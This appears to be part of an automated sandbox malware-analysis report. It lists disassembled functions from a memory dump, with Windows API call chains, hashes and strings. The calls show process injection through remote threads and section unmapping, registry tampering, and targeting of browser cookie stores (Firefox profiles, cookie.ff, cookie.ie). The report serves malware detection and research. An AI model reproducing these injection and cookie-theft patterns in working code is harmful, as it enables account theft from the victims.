  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
